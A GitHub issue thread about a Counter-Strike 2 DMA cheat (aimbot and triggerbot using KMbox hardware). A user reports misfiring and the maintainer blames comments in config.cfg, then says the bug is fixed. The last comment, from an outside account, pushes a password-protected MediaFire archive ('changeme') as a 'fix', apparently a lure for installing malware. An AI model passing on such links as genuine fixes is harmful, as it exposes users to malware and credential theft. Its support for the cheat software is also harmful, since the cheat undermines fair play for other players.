### ISSUE TITLE
nothing works

### ISSUE THREAD

**Issue by 123lolj** [Enoouo/Pro-CS2_DMA#10]
I deleted all comments and it doesn't work.
when the button is pressed the triggerbot/aimbot shoots every second even without an enemy..

[+] Initializing KMbox...
[+] KMbox NET initialized successfully
[+] Counter-Strike 2 found.
[-] Updating offsets, please wait
[==================================================] 100%[+] Updata offsets successful
[-] Disable rendering layer
[+] Loaded [de_dust2] 442.665ms
[#] DefuserGreymouth
[#] DefuserGreymouth
[#] DefuserGreymouth
~

**Comment by Enoouo** [comment]
Delete the spaces between comments in the config.cfg file, or remove the comments entirely. They are causing issues with reading the config correctly. A fixed version will be released soon. The console currently prints some test logs—no need to worry about them, as this will be fixed in the upcoming version.

**Comment by Enoouo** [comment]
Fixed. Please download again.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
